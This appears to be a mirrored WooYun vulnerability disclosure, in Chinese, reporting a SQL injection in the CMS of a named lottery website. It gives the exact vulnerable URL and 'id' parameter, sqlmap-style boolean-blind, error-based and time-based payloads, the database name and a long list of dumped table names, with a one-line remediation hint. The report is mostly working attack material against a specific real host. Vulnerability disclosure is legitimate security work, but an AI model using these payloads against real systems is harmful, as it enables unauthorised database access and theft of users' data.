乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-09-04: 厂商已经主动忽略漏洞,细节向公众公开
第一彩采彡PIAO某站存在sql注入漏洞(可脱库)
第一彩采彡PIAOcms存在sql注入漏洞可脱库获取1000多个表的内容,http://cms.diyicai.com/
首先是注入点:http://cms.diyicai.com/php/play_num.php?callback=jsonp1437375317596&&type=update&random=0.000027690278299852267&id=1414428注入点为:id
Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: callback=jsonp1437375317596&&type=update&random=0.000027690278299852267&id=1414428 AND 1204=1204 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: callback=jsonp1437375317596&&type=update&random=0.000027690278299852267&id=1414428 AND (SELECT 3690 FROM(SELECT COUNT(*),CONCAT(0x716a627871,(SELECT (ELT(3690=3690,1))),0x716a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: callback=jsonp1437375317596&&type=update&random=0.000027690278299852267&id=1414428 AND (SELECT * FROM (SELECT(SLEEP(5)))txRf)
通过注入可跑出数据库
当前库为:tidemedia_cms_2在该数据库有1000多个表
backup_config || channel || channel_aboutus || channel_cus_feedback || channel_customers || channel_demand || channel_email || channel_feedback || channel_increment_index || channel_job || channel_newgametest || channel_newscenter || channel_order || channel_privilege || channel_product_manage || channel_product_set || channel_products || channel_s20_k_c || channel_s3 || channel_s30 || channel_s30_a || channel_s30_a_b || channel_s30_a_k || channel_s30_a_n || channel_s30_a_o || channel_s30_a_p || channel_s30_a_q || channel_s30_a_r || channel_s30_a_s || channel_s30_a_t || channel_s30_a_u || channel_s30_a_v || channel_s30_a_w || channel_s30_a_x || channel_s30_a_y . . .| channel_s68 || channel_s68_a || channel_s69 || channel_s70 || channel_s71 || channel_s72 || channel_s72_a || channel_s72_b || channel_s72_c || channel_service || channel_site_2 || channel_site_3 || channel_site_4 || channel_siteinfo || channel_table_all || channel_template || channel_testapp || channel_webroot || channel_webuser || commend_item || counter_browser || counter_info_list || counter_referer || counter_screen || counter_stat_day || counter_stat_month || counter_stat_week || counter_stat_year || counter_system || counter_visit || counter_web || dict || dict_group || document_content || email_address || email_config || email_content || email_send_status |+----------------------
通过跑表可获取很多敏感信息,随便跑了两个表:
做好过滤
未能联系到厂商或者厂商积极拒绝